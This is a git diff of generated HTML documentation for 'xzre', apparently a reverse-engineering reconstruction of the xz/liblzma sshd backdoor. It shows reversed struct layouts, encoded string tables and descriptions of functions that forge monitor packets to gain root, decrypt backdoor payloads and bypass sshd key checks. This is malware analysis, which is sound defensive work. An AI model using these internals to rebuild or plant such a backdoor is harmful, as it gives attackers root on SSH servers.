+ + + + diff --git a/unionpayload.html b/unionpayload.html new file mode 100644 index 0000000..ba1886e --- /dev/null +++ b/unionpayload.html @@ -0,0 +1,96 @@ + + + + + + + +xzre: payload Union Reference + + + + + + + + + +
+
+

Data Fields

+BOOL unkbool_log_handler
 
+BOOL syslog_disabled
 
char * STR_percent_s
 
+ + + + + +
+
xzre +
+
+ + + + + + + + + +
+
+ + +
+ +
+ + +
+
+Data Fields
+
+
payload Union Reference
+
+
+ +

payload union within run_backdoor_commands + More...

+ +

#include <xzre.h>

+ + + + + + +

+Data Fields

+monitor_data_t monitor
 
+u8 data [608]
 
+

Detailed Description

+

payload union within run_backdoor_commands

+
The documentation for this union was generated from the following file: +
+ +
+Generated by doxygen 1.9.1 +
+ + diff --git a/xzre_8h.html b/xzre_8h.html index 00a3efa..3615404 100644 --- a/xzre_8h.html +++ b/xzre_8h.html @@ -181,6 +181,15 @@   struct  key_ctx   +struct  monitor_data + data used within sshd_proxy_elevate More...
+  +union  payload + payload union within run_backdoor_commands More...
+  +struct  run_backdoor_commands_data + stack frame layout for run_backdoor_commands More...
+  struct  backdoor_cpuid_reloc_consts   struct  backdoor_tls_get_addr_reloc_consts @@ -191,8 +200,6 @@   struct  instruction_search_ctx   -struct  sshd_proxy_args -  struct  dl_tls_index   @@ -234,6 +241,12 @@ + + + + @@ -270,6 +283,9 @@ + +
#define ED448_KEY_SIZE   57
 
+#define ED448_SIGNATURE_SIZE   114
 
+#define X_BN_num_bytes(bits)   (((bits)+7)/8)
 
#define XZDASM_OPC(op)   (op - 0x80)
 
#define PERMIT_YES   3
 
+#define TEST_FLAG(x, flag)   (((x) & (flag)) != 0)
 
@@ -403,6 +419,18 @@ + + + + + + + + + @@ -418,9 +446,6 @@ - - @@ -1135,6 +1160,9 @@ + + @@ -1517,8 +1545,77 @@   +  + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -1576,30 +1673,9 @@ - - - - - - - - - - - - - - - - - + + + @@ -1878,14 +1954,14 @@ - + - + @@ -5253,7 +5329,7 @@

-

runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed function

+

runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed function

Parameters

Typedefs

typedef struct key_ctx key_ctx_t
 
+typedef struct monitor_data monitor_data_t
 data used within sshd_proxy_elevate
 
+typedef union payload payload_t
 payload union within run_backdoor_commands
 
+typedef struct run_backdoor_commands_data run_backdoor_commands_data_t
 stack frame layout for run_backdoor_commands
 
typedef struct backdoor_cpuid_reloc_consts backdoor_cpuid_reloc_consts_t
 
typedef struct instruction_search_ctx instruction_search_ctx_t
 
-typedef struct sshd_proxy_args sshd_proxy_args_t
 
typedef struct dl_tls_index tls_index
 
 assert_offset (sshd_ctx_t, STR_publickey, 0xD8)
 
assert_offset (sshd_log_ctx_t, syslog_disabled, 0x8)
 
 assert_offset (sshd_log_ctx_t, STR_percent_s, 0x10)
 
assert_offset (key_ctx_t, args, 0x10)
 
assert_offset (key_ctx_t, payload, 0x15)
assert_offset (key_ctx_t, payload, 0x15)
 
assert_offset (key_ctx_t, ivec, 0x26D)
 
assert_offset (key_ctx_t, ed448_key, 0x27D)
 
assert_offset (monitor_data_t, cmd_type, 0)
 
assert_offset (monitor_data_t, args, 0x8)
 
assert_offset (monitor_data_t, rsa_n, 0x10)
 
assert_offset (monitor_data_t, rsa_e, 0x18)
 
assert_offset (monitor_data_t, payload_body, 0x20)
 
assert_offset (monitor_data_t, payload_body_size, 0x28)
 
assert_offset (monitor_data_t, rsa, 0x30)
 
assert_offset (run_backdoor_commands_data_t, body_size, 0)
 
assert_offset (run_backdoor_commands_data_t, p_do_orig, 8)
 
assert_offset (run_backdoor_commands_data_t, payload_size, 0x10)
 
assert_offset (run_backdoor_commands_data_t, hostkey_hash_offset, 0x18)
 
assert_offset (run_backdoor_commands_data_t, rsa, 0x20)
 
assert_offset (run_backdoor_commands_data_t, ed448_key_ptr, 0x30)
 
assert_offset (run_backdoor_commands_data_t, num_keys, 0x38)
 
assert_offset (run_backdoor_commands_data_t, key_cur_idx, 0x44)
 
assert_offset (run_backdoor_commands_data_t, key_prev_idx, 0x48)
 
assert_offset (run_backdoor_commands_data_t, num_host_keys, 0x58)
 
assert_offset (run_backdoor_commands_data_t, num_host_pubkeys, 0x60)
 
assert_offset (run_backdoor_commands_data_t, ed448_key, 0x68)
 
assert_offset (run_backdoor_commands_data_t, payload, 0xA8)
 
assert_offset (run_backdoor_commands_data_t, kctx, 0x308)
 
 assert_offset (backdoor_cpuid_reloc_consts_t, cpuid_random_symbol_got_offset, 0)
 
 assert_offset (instruction_search_ctx_t, imported_funcs, 0x38)
 
assert_offset (sshd_proxy_args_t, cmd_type, 0)
 
assert_offset (sshd_proxy_args_t, args, 0x8)
 
assert_offset (sshd_proxy_args_t, rsa_n, 0x10)
 
assert_offset (sshd_proxy_args_t, rsa_e, 0x18)
 
assert_offset (sshd_proxy_args_t, payload_body, 0x20)
 
assert_offset (sshd_proxy_args_t, payload_body_size, 0x28)
 
assert_offset (sshd_proxy_args_t, rsa, 0x30)
 
BOOL sshd_proxy_elevate (sshd_proxy_args_t *args, global_context_t *ctx)
 forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges through the sshd monitor. More...
 
BOOL sshd_proxy_elevate (monitor_data_t *args, global_context_t *ctx)
 forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges through the sshd monitor. More...
 
BOOL x86_dasm (dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
 disassembles the given x64 code More...
 
BOOL is_payload_message (u8 *sshbuf_data, size_t sshbuf_size, size_t *pOutPayloadSize, global_context_t *ctx)
 checks if the given sshbuf buffer contains a backdoor payload message More...
 
BOOL decrypt_payload_message (void *payload, size_t payload_size, global_context_t *ctx)
BOOL decrypt_payload_message (void *payload, size_t payload_size, global_context_t *ctx)
 decrypts the given backdoor payload More...
 
BOOL check_backdoor_state (global_context_t *ctx)
 checks if the backdoor state is the expected one (FIXME: which?) More...
 
int mm_answer_keyallowed_hook (struct ssh *ssh, int sock, struct sshbuf *m)
 runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed function More...
 runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed function More...
 
int mm_answer_keyverify_hook (struct ssh *ssh, int sock, struct sshbuf *m)
 used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check More...
@@ -6805,8 +6881,8 @@

-

◆ sshd_proxy_elevate()

+ +

◆ sshd_proxy_elevate()

@@ -6814,7 +6890,7 @@

BOOL sshd_proxy_elevate

- + diff --git a/xzre_8h_source.html b/xzre_8h_source.html index 8d4be55..c607ddf 100644 --- a/xzre_8h_source.html +++ b/xzre_8h_source.html @@ -315,1856 +315,1911 @@
293 #define CHACHA20_IV_SIZE 16
294 #define SHA256_DIGEST_SIZE 32
295 #define ED448_KEY_SIZE 57
-
296 
-
297 // opcode is always +0x80 for the sake of it (yet another obfuscation)
-
298 #define XZDASM_OPC(op) (op - 0x80)
+
296 #define ED448_SIGNATURE_SIZE 114
+
297 
+
298 #define X_BN_num_bytes(bits) (((bits)+7)/8)
299 
-
300 typedef int BOOL;
-
301 
-
302 #define TRUE 1
-
303 #define FALSE 0
+
300 // opcode is always +0x80 for the sake of it (yet another obfuscation)
+
301 #define XZDASM_OPC(op) (op - 0x80)
+
302 
+
303 typedef int BOOL;
304 
-
305 typedef enum {
-
306  // has lock or rep prefix
-
307  DF_LOCK_REP = 1,
-
308  // has segment override
-
309  DF_SEG = 2,
-
310  // has operand size override
-
311  DF_OSIZE = 4,
-
312  // has address size override
-
313  DF_ASIZE = 8,
-
314  // vex instruction
-
315  DF_VEX = 0x10,
-
316  // has rex
-
317  DF_REX = 0x20,
-
318  // has modrm
-
319  DF_MODRM = 0x40,
-
320  // has sib
-
321  DF_SIB = 0x80
-
322 } InstructionFlags;
-
323 
-
324 typedef enum {
-
325  // memory with displacement
-
326  DF_MEM_DISP = 0x1,
-
327  // 8-bit displacement
-
328  DF_MEM_DISP8 = 0x2,
-
329  // memory seg+offs (0xa0-0xa3)
-
330  DF_MEM_SEG_OFFS = 0x4,
-
331  // has immediate
-
332  DF_IMM = 0x8,
-
333  // 64-bit immediate (movabs)
-
334  DF_IMM64 = 0x10
-
335 } InstructionFlags2;
-
336 
-
337 typedef enum {
-
338  // ELF has JMPREL relocs
-
339  X_ELF_PLTREL = 0x1,
-
340  // ELF has RELA relocs
-
341  X_ELF_RELA = 0x2,
-
342  // ELF has RELR relocs
-
343  X_ELF_RELR = 0x4,
-
344  // ELF has DT_VERDEF
-
345  X_ELF_VERDEF = 0x8,
-
346  // ELF has DT_VERSYM
-
347  X_ELF_VERSYM = 0x10,
-
348  // ELF has DF_1_NOW
-
349  X_ELF_NOW = 0x20
-
350 } ElfFlags;
-
351 
-
352 typedef enum {
-
353  // register-indirect addressing or no displacement
-
354  MRM_I_REG, // 00
-
355  // indirect with one byte displacement
-
356  MRM_I_DISP1, // 01
-
357  // indirect with four byte displacement
-
358  MRM_I_DISP4, // 10
-
359  // direct-register addressing
-
360  MRM_D_REG // 11
-
361 } ModRm_Mod;
-
362 
-
363 typedef enum {
-
364  // find function beginning by looking for endbr64
-
365  FIND_ENDBR64,
-
366  // find function beginning by looking for padding,
-
367  // then getting the instruction after it
-
368  FIND_NOP
-
369 } FuncFindType;
-
370 
-
371 typedef enum {
-
376  X_ELF_MAIN = 0,
-
377  X_ELF_DYNAMIC_LINKER = 1,
-
378  X_ELF_LIBC = 2,
-
379  X_ELF_LIBCRYPTO = 3
-
380 } ElfId;
-
381 
-
382 typedef enum {
-
383  XREF_xcalloc_zero_size = 0,
-
384  XREF_Could_not_chdir_to_home_directory_s_s = 1,
-
385  XREF_list_hostkey_types = 2,
-
386  XREF_demote_sensitive_data = 3,
-
387  XREF_mm_terminate = 4,
-
388  XREF_mm_pty_allocate = 5,
-
389  XREF_mm_do_pam_account = 6,
-
390  XREF_mm_session_pty_cleanup2 = 7,
-
391  XREF_mm_getpwnamallow = 8,
-
392  XREF_mm_sshpam_init_ctx = 9,
-
393  XREF_mm_sshpam_query = 10,
-
394  XREF_mm_sshpam_respond = 11,
-
395  XREF_mm_sshpam_free_ctx = 12,
-
396  XREF_mm_choose_dh = 13,
-
397  XREF_sshpam_respond = 14,
-
398  XREF_sshpam_auth_passwd = 15,
-
399  XREF_sshpam_query = 16,
-
400  XREF_start_pam = 17,
-
401  XREF_mm_request_send = 18,
-
402  XREF_mm_log_handler = 19,
-
403  XREF_Could_not_get_agent_socket = 20,
-
404  XREF_auth_root_allowed = 21,
-
405  XREF_mm_answer_authpassword = 22,
-
406  XREF_mm_answer_keyallowed = 23,
-
407  XREF_mm_answer_keyverify = 24,
-
408  XREF_48s_48s_d_pid_ld_ = 25,
-
409  XREF_Unrecognized_internal_syslog_level_code_d = 26
-
410 } StringXrefId;
-
411 
-
412 typedef enum {
-
413  STR_from = 0x810,
-
414  STR_ssh2 = 0x678,
-
415  STR_48s_48s_d_pid_ld_ = 0xd8,
-
416  STR_s = 0x708,
-
417  STR_usr_sbin_sshd = 0x108,
-
418  STR_Accepted_password_for = 0x870,
-
419  STR_Accepted_publickey_for = 0x1a0,
-
420  STR_BN_bin2bn = 0xc40,
-
421  STR_BN_bn2bin = 0x6d0,
-
422  STR_BN_dup = 0x958,
-
423  STR_BN_free = 0x418,
-
424  STR_BN_num_bits = 0x4e0,
-
425  STR_Connection_closed_by = 0x790,
-
426  STR_Could_not_chdir_to_home_directory_s_s = 0x18,
-
427  STR_Could_not_get_agent_socket = 0xb0,
-
428  STR_DISPLAY = 0x960,
-
429  STR_DSA_get0_pqg = 0x9d0,
-
430  STR_DSA_get0_pub_key = 0x468,
-
431  STR_EC_KEY_get0_group = 0x7e8,
-
432  STR_EC_KEY_get0_public_key = 0x268,
-
433  STR_EC_POINT_point2oct = 0x6e0,
-
434  STR_EVP_CIPHER_CTX_free = 0xb28,
-
435  STR_EVP_CIPHER_CTX_new = 0x838,
-
436  STR_EVP_DecryptFinal_ex = 0x2a8,
-
437  STR_EVP_DecryptInit_ex = 0xc08,
-
438  STR_EVP_DecryptUpdate = 0x3f0,
-
439  STR_EVP_Digest = 0xf8,
-
440  STR_EVP_DigestVerify = 0x408,
-
441  STR_EVP_DigestVerifyInit = 0x118,
-
442  STR_EVP_MD_CTX_free = 0xd10,
-
443  STR_EVP_MD_CTX_new = 0xaf8,
-
444  STR_EVP_PKEY_free = 0x6f8,
-
445  STR_EVP_PKEY_new_raw_public_key = 0x758,
-
446  STR_EVP_PKEY_set1_RSA = 0x510,
-
447  STR_EVP_chacha20 = 0xc28,
-
448  STR_EVP_sha256 = 0xc60,
-
449  STR_EVP_sm = 0x188,
-
450  STR_GLIBC_2_2_5 = 0x8c0,
-
451  STR_GLRO_dl_naudit_naudit = 0x6a8,
-
452  STR_KRB5CCNAME = 0x1e0,
-
453  STR_LD_AUDIT = 0xcf0,
-
454  STR_LD_BIND_NOT = 0xbc0,
-
455  STR_LD_DEBUG = 0xa90,
-
456  STR_LD_PROFILE = 0xb98,
-
457  STR_LD_USE_LOAD_BIAS = 0x3e0,
-
458  STR_LINES = 0xa88,
-
459  STR_RSA_free = 0xac0,
-
460  STR_RSA_get0_key = 0x798,
-
461  STR_RSA_new = 0x918,
-
462  STR_RSA_public_decrypt = 0x1d0,
-
463  STR_RSA_set0_key = 0x540,
-
464  STR_RSA_sign = 0x8f8,
-
465  STR_SSH_2_0 = 0x990,
-
466  STR_TERM = 0x4a8,
-
467  STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
-
468  STR_WAYLAND_DISPLAY = 0x158,
-
469  STR_errno_location = 0x878,
-
470  STR_libc_stack_end = 0x2b0,
-
471  STR_libc_start_main = 0x228,
-
472  STR_dl_audit_preinit = 0xa60,
-
473  STR_dl_audit_symbind_alt = 0x9c8,
-
474  STR_exit = 0x8a8,
-
475  STR_r_debug = 0x5b0,
-
476  STR_rtld_global = 0x5b8,
-
477  STR_rtld_global_ro = 0xa98,
-
478  STR_auth_root_allowed = 0xb8,
-
479  STR_authenticating = 0x1d8,
-
480  STR_demote_sensitive_data = 0x28,
-
481  STR_getuid = 0x348,
-
482  STR_ld_linux_x86_64_so = 0xa48,
-
483  STR_libc_so = 0x7d0,
-
484  STR_libcrypto_so = 0x7c0,
-
485  STR_liblzma_so = 0x590,
-
486  STR_libsystemd_so = 0x938,
-
487  STR_list_hostkey_types = 0x20,
-
488  STR_malloc_usable_size = 0x440,
-
489  STR_mm_answer_authpassword = 0xc0,
-
490  STR_mm_answer_keyallowed = 0xc8,
-
491  STR_mm_answer_keyverify = 0xd0,
-
492  STR_mm_answer_pam_start = 0x948,
-
493  STR_mm_choose_dh = 0x78,
-
494  STR_mm_do_pam_account = 0x40,
-
495  STR_mm_getpwnamallow = 0x50,
-
496  STR_mm_log_handler = 0xa8,
-
497  STR_mm_pty_allocate = 0x38,
-
498  STR_mm_request_send = 0xa0,
-
499  STR_mm_session_pty_cleanup2 = 0x48,
-
500  STR_mm_sshpam_free_ctx = 0x70,
-
501  STR_mm_sshpam_init_ctx = 0x58,
-
502  STR_mm_sshpam_query = 0x60,
-
503  STR_mm_sshpam_respond = 0x68,
-
504  STR_mm_terminate = 0x30,
-
505  STR_parse_PAM = 0xc58,
-
506  STR_password = 0x400,
-
507  STR_preauth = 0x4f0,
-
508  STR_pselect = 0x690,
-
509  STR_publickey = 0x7b8,
-
510  STR_read = 0x308,
-
511  STR_rsa_sha2_256 = 0x710,
-
512  STR_setlogmask = 0x428,
-
513  STR_setresgid = 0x5f0,
-
514  STR_setresuid = 0xab8,
-
515  STR_shutdown = 0x760,
-
516  STR_ssh_2_0 = 0xd08,
-
517  STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
-
518  STR_sshpam_auth_passwd = 0x88,
-
519  STR_sshpam_query = 0x90,
-
520  STR_sshpam_respond = 0x80,
-
521  STR_start_pam = 0x98,
-
522  STR_system = 0x9f8,
-
523  STR_unknown = 0x198,
-
524  STR_user = 0xb10,
-
525  STR_write = 0x380,
-
526  STR_xcalloc_zero_size = 0x10,
-
527  STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
-
528  STR_ELF = 0x300,
-
529 } EncodedStringId;
-
530 
-
531 #ifndef XZRE_SLIM
-
532 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
-
533 #else
-
534 #define assert_offset(t, f, o)
-
535 #endif
-
536 
-
537 #define CONCAT(x, y) x ## y
-
538 #define EXPAND(x, y) CONCAT(x, y)
-
539 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
-
540 
-
541 struct sshbuf;
-
542 struct kex;
+
305 #define TRUE 1
+
306 #define FALSE 0
+
307 
+
308 typedef enum {
+
309  // has lock or rep prefix
+
310  DF_LOCK_REP = 1,
+
311  // has segment override
+
312  DF_SEG = 2,
+
313  // has operand size override
+
314  DF_OSIZE = 4,
+
315  // has address size override
+
316  DF_ASIZE = 8,
+
317  // vex instruction
+
318  DF_VEX = 0x10,
+
319  // has rex
+
320  DF_REX = 0x20,
+
321  // has modrm
+
322  DF_MODRM = 0x40,
+
323  // has sib
+
324  DF_SIB = 0x80
+
325 } InstructionFlags;
+
326 
+
327 typedef enum {
+
328  // memory with displacement
+
329  DF_MEM_DISP = 0x1,
+
330  // 8-bit displacement
+
331  DF_MEM_DISP8 = 0x2,
+
332  // memory seg+offs (0xa0-0xa3)
+
333  DF_MEM_SEG_OFFS = 0x4,
+
334  // has immediate
+
335  DF_IMM = 0x8,
+
336  // 64-bit immediate (movabs)
+
337  DF_IMM64 = 0x10
+
338 } InstructionFlags2;
+
339 
+
340 typedef enum {
+
341  // ELF has JMPREL relocs
+
342  X_ELF_PLTREL = 0x1,
+
343  // ELF has RELA relocs
+
344  X_ELF_RELA = 0x2,
+
345  // ELF has RELR relocs
+
346  X_ELF_RELR = 0x4,
+
347  // ELF has DT_VERDEF
+
348  X_ELF_VERDEF = 0x8,
+
349  // ELF has DT_VERSYM
+
350  X_ELF_VERSYM = 0x10,
+
351  // ELF has DF_1_NOW
+
352  X_ELF_NOW = 0x20
+
353 } ElfFlags;
+
354 
+
355 typedef enum {
+
356  // register-indirect addressing or no displacement
+
357  MRM_I_REG, // 00
+
358  // indirect with one byte displacement
+
359  MRM_I_DISP1, // 01
+
360  // indirect with four byte displacement
+
361  MRM_I_DISP4, // 10
+
362  // direct-register addressing
+
363  MRM_D_REG // 11
+
364 } ModRm_Mod;
+
365 
+
366 typedef enum {
+
367  // find function beginning by looking for endbr64
+
368  FIND_ENDBR64,
+
369  // find function beginning by looking for padding,
+
370  // then getting the instruction after it
+
371  FIND_NOP
+
372 } FuncFindType;
+
373 
+
374 typedef enum {
+
379  X_ELF_MAIN = 0,
+
380  X_ELF_DYNAMIC_LINKER = 1,
+
381  X_ELF_LIBC = 2,
+
382  X_ELF_LIBCRYPTO = 3
+
383 } ElfId;
+
384 
+
385 typedef enum {
+
386  XREF_xcalloc_zero_size = 0,
+
387  XREF_Could_not_chdir_to_home_directory_s_s = 1,
+
388  XREF_list_hostkey_types = 2,
+
389  XREF_demote_sensitive_data = 3,
+
390  XREF_mm_terminate = 4,
+
391  XREF_mm_pty_allocate = 5,
+
392  XREF_mm_do_pam_account = 6,
+
393  XREF_mm_session_pty_cleanup2 = 7,
+
394  XREF_mm_getpwnamallow = 8,
+
395  XREF_mm_sshpam_init_ctx = 9,
+
396  XREF_mm_sshpam_query = 10,
+
397  XREF_mm_sshpam_respond = 11,
+
398  XREF_mm_sshpam_free_ctx = 12,
+
399  XREF_mm_choose_dh = 13,
+
400  XREF_sshpam_respond = 14,
+
401  XREF_sshpam_auth_passwd = 15,
+
402  XREF_sshpam_query = 16,
+
403  XREF_start_pam = 17,
+
404  XREF_mm_request_send = 18,
+
405  XREF_mm_log_handler = 19,
+
406  XREF_Could_not_get_agent_socket = 20,
+
407  XREF_auth_root_allowed = 21,
+
408  XREF_mm_answer_authpassword = 22,
+
409  XREF_mm_answer_keyallowed = 23,
+
410  XREF_mm_answer_keyverify = 24,
+
411  XREF_48s_48s_d_pid_ld_ = 25,
+
412  XREF_Unrecognized_internal_syslog_level_code_d = 26
+
413 } StringXrefId;
+
414 
+
415 typedef enum {
+
416  STR_from = 0x810,
+
417  STR_ssh2 = 0x678,
+
418  STR_48s_48s_d_pid_ld_ = 0xd8,
+
419  STR_s = 0x708,
+
420  STR_usr_sbin_sshd = 0x108,
+
421  STR_Accepted_password_for = 0x870,
+
422  STR_Accepted_publickey_for = 0x1a0,
+
423  STR_BN_bin2bn = 0xc40,
+
424  STR_BN_bn2bin = 0x6d0,
+
425  STR_BN_dup = 0x958,
+
426  STR_BN_free = 0x418,
+
427  STR_BN_num_bits = 0x4e0,
+
428  STR_Connection_closed_by = 0x790,
+
429  STR_Could_not_chdir_to_home_directory_s_s = 0x18,
+
430  STR_Could_not_get_agent_socket = 0xb0,
+
431  STR_DISPLAY = 0x960,
+
432  STR_DSA_get0_pqg = 0x9d0,
+
433  STR_DSA_get0_pub_key = 0x468,
+
434  STR_EC_KEY_get0_group = 0x7e8,
+
435  STR_EC_KEY_get0_public_key = 0x268,
+
436  STR_EC_POINT_point2oct = 0x6e0,
+
437  STR_EVP_CIPHER_CTX_free = 0xb28,
+
438  STR_EVP_CIPHER_CTX_new = 0x838,
+
439  STR_EVP_DecryptFinal_ex = 0x2a8,
+
440  STR_EVP_DecryptInit_ex = 0xc08,
+
441  STR_EVP_DecryptUpdate = 0x3f0,
+
442  STR_EVP_Digest = 0xf8,
+
443  STR_EVP_DigestVerify = 0x408,
+
444  STR_EVP_DigestVerifyInit = 0x118,
+
445  STR_EVP_MD_CTX_free = 0xd10,
+
446  STR_EVP_MD_CTX_new = 0xaf8,
+
447  STR_EVP_PKEY_free = 0x6f8,
+
448  STR_EVP_PKEY_new_raw_public_key = 0x758,
+
449  STR_EVP_PKEY_set1_RSA = 0x510,
+
450  STR_EVP_chacha20 = 0xc28,
+
451  STR_EVP_sha256 = 0xc60,
+
452  STR_EVP_sm = 0x188,
+
453  STR_GLIBC_2_2_5 = 0x8c0,
+
454  STR_GLRO_dl_naudit_naudit = 0x6a8,
+
455  STR_KRB5CCNAME = 0x1e0,
+
456  STR_LD_AUDIT = 0xcf0,
+
457  STR_LD_BIND_NOT = 0xbc0,
+
458  STR_LD_DEBUG = 0xa90,
+
459  STR_LD_PROFILE = 0xb98,
+
460  STR_LD_USE_LOAD_BIAS = 0x3e0,
+
461  STR_LINES = 0xa88,
+
462  STR_RSA_free = 0xac0,
+
463  STR_RSA_get0_key = 0x798,
+
464  STR_RSA_new = 0x918,
+
465  STR_RSA_public_decrypt = 0x1d0,
+
466  STR_RSA_set0_key = 0x540,
+
467  STR_RSA_sign = 0x8f8,
+
468  STR_SSH_2_0 = 0x990,
+
469  STR_TERM = 0x4a8,
+
470  STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
+
471  STR_WAYLAND_DISPLAY = 0x158,
+
472  STR_errno_location = 0x878,
+
473  STR_libc_stack_end = 0x2b0,
+
474  STR_libc_start_main = 0x228,
+
475  STR_dl_audit_preinit = 0xa60,
+
476  STR_dl_audit_symbind_alt = 0x9c8,
+
477  STR_exit = 0x8a8,
+
478  STR_r_debug = 0x5b0,
+
479  STR_rtld_global = 0x5b8,
+
480  STR_rtld_global_ro = 0xa98,
+
481  STR_auth_root_allowed = 0xb8,
+
482  STR_authenticating = 0x1d8,
+
483  STR_demote_sensitive_data = 0x28,
+
484  STR_getuid = 0x348,
+
485  STR_ld_linux_x86_64_so = 0xa48,
+
486  STR_libc_so = 0x7d0,
+
487  STR_libcrypto_so = 0x7c0,
+
488  STR_liblzma_so = 0x590,
+
489  STR_libsystemd_so = 0x938,
+
490  STR_list_hostkey_types = 0x20,
+
491  STR_malloc_usable_size = 0x440,
+
492  STR_mm_answer_authpassword = 0xc0,
+
493  STR_mm_answer_keyallowed = 0xc8,
+
494  STR_mm_answer_keyverify = 0xd0,
+
495  STR_mm_answer_pam_start = 0x948,
+
496  STR_mm_choose_dh = 0x78,
+
497  STR_mm_do_pam_account = 0x40,
+
498  STR_mm_getpwnamallow = 0x50,
+
499  STR_mm_log_handler = 0xa8,
+
500  STR_mm_pty_allocate = 0x38,
+
501  STR_mm_request_send = 0xa0,
+
502  STR_mm_session_pty_cleanup2 = 0x48,
+
503  STR_mm_sshpam_free_ctx = 0x70,
+
504  STR_mm_sshpam_init_ctx = 0x58,
+
505  STR_mm_sshpam_query = 0x60,
+
506  STR_mm_sshpam_respond = 0x68,
+
507  STR_mm_terminate = 0x30,
+
508  STR_parse_PAM = 0xc58,
+
509  STR_password = 0x400,
+
510  STR_preauth = 0x4f0,
+
511  STR_pselect = 0x690,
+
512  STR_publickey = 0x7b8,
+
513  STR_read = 0x308,
+
514  STR_rsa_sha2_256 = 0x710,
+
515  STR_setlogmask = 0x428,
+
516  STR_setresgid = 0x5f0,
+
517  STR_setresuid = 0xab8,
+
518  STR_shutdown = 0x760,
+
519  STR_ssh_2_0 = 0xd08,
+
520  STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
+
521  STR_sshpam_auth_passwd = 0x88,
+
522  STR_sshpam_query = 0x90,
+
523  STR_sshpam_respond = 0x80,
+
524  STR_start_pam = 0x98,
+
525  STR_system = 0x9f8,
+
526  STR_unknown = 0x198,
+
527  STR_user = 0xb10,
+
528  STR_write = 0x380,
+
529  STR_xcalloc_zero_size = 0x10,
+
530  STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
+
531  STR_ELF = 0x300,
+
532 } EncodedStringId;
+
533 
+
534 #ifndef XZRE_SLIM
+
535 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
+
536 #else
+
537 #define assert_offset(t, f, o)
+
538 #endif
+
539 
+
540 #define CONCAT(x, y) x ## y
+
541 #define EXPAND(x, y) CONCAT(x, y)
+
542 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
543 
-
544 /* permit_root_login */
-
545 #define PERMIT_NOT_SET -1
-
546 #define PERMIT_NO 0
-
547 #define PERMIT_FORCED_ONLY 1
-
548 #define PERMIT_NO_PASSWD 2
-
549 #define PERMIT_YES 3
-
550 
-
554 struct monitor {
-
555  int m_recvfd;
-
556  int m_sendfd;
-
557  int m_log_recvfd;
-
558  int m_log_sendfd;
-
559  struct kex **m_pkex;
-
560  pid_t m_pid;
-
561 };
-
562 
-
566 struct sensitive_data {
-
567  struct sshkey **host_keys; /* all private host keys */
-
568  struct sshkey **host_pubkeys; /* all public host keys */
-
569  struct sshkey **host_certificates; /* all public host certificates */
-
570  int have_ssh2_key;
-
571 };
-
572 
-
577 struct sshkey {
-
578  int type;
-
579  int flags;
-
580  /* KEY_RSA */
-
581  RSA *rsa;
-
582  /* KEY_DSA */
-
583  DSA *dsa;
-
584  /* KEY_ECDSA and KEY_ECDSA_SK */
-
585  int ecdsa_nid; /* NID of curve */
-
586  EC_KEY *ecdsa;
-
587  /* KEY_ED25519 and KEY_ED25519_SK */
-
588  u8 *ed25519_sk;
-
589  u8 *ed25519_pk;
-
590  /* KEY_XMSS */
-
591  char *xmss_name;
-
592  char *xmss_filename; /* for state file updates */
-
593  void *xmss_state; /* depends on xmss_name, opaque */
-
594  u8 *xmss_sk;
-
595  u8 *xmss_pk;
-
596  /* KEY_ECDSA_SK and KEY_ED25519_SK */
-
597  char sk_application;
-
598  u8 sk_flags;
-
599  struct sshbuf *sk_key_handle;
-
600  struct sshbuf *sk_reserved;
-
601  /* Certificates */
-
602  struct sshkey_cert *cert;
-
603  /* Private key shielding */
-
604  u8 *shielded_private;
-
605  size_t shielded_len;
-
606  u8 *shield_prekey;
-
607  size_t shield_prekey_len;
-
608 };
-
609 
-
610 typedef struct __attribute__((packed)) got_ctx {
-
614  void *got_ptr;
-
621  void *return_address;
-
625  void *cpuid_fn;
-
630  ptrdiff_t got_offset;
-
631 } got_ctx_t;
-
632 
-
633 assert_offset(got_ctx_t, got_ptr, 0);
-
634 assert_offset(got_ctx_t, return_address, 0x8);
-
635 assert_offset(got_ctx_t, cpuid_fn, 0x10);
-
636 assert_offset(got_ctx_t, got_offset, 0x18);
-
637 static_assert(sizeof(got_ctx_t) == 0x20);
-
638 
-
639 typedef struct __attribute__((packed)) elf_entry_ctx {
-
644  void *symbol_ptr;
-
645  got_ctx_t got_ctx;
-
649  u64 *frame_address;
-
650 } elf_entry_ctx_t;
-
651 
-
652 assert_offset(elf_entry_ctx_t, symbol_ptr, 0);
-
653 assert_offset(elf_entry_ctx_t, got_ctx, 0x8);
-
654 assert_offset(elf_entry_ctx_t, frame_address, 0x28);
-
655 
-
656 typedef struct __attribute__((packed)) dasm_ctx {
-
657  u8* instruction;
-
658  u64 instruction_size;
-
659  union {
-
660  struct __attribute__((packed)) {
-
664  u8 flags;
-
668  u8 flags2;
-
669  PADDING(2);
-
670  u8 lock_rep_byte;
-
671  u8 seg_byte;
-
672  u8 osize_byte;
-
673  u8 asize_byte;
-
674  u8 vex_byte;
-
675  u8 vex_byte2;
-
676  u8 vex_byte3;
-
677  u8 rex_byte;
-
678  union {
-
679  struct __attribute__((packed)) {
-
680  u8 modrm;
-
681  u8 modrm_mod;
-
682  u8 modrm_reg;
-
683  u8 modrm_rm;
-
684  };
-
685  u32 modrm_word;
-
686  };
-
687  };
-
688  u16 flags_u16;
-
689  };
-
690  u8 imm64_reg; // low 3 bits only
-
691  struct __attribute__((packed)) {
-
692  union {
-
693  struct __attribute__((packed)) {
-
694  u8 sib;
-
695  u8 sib_scale;
-
696  u8 sib_index;
-
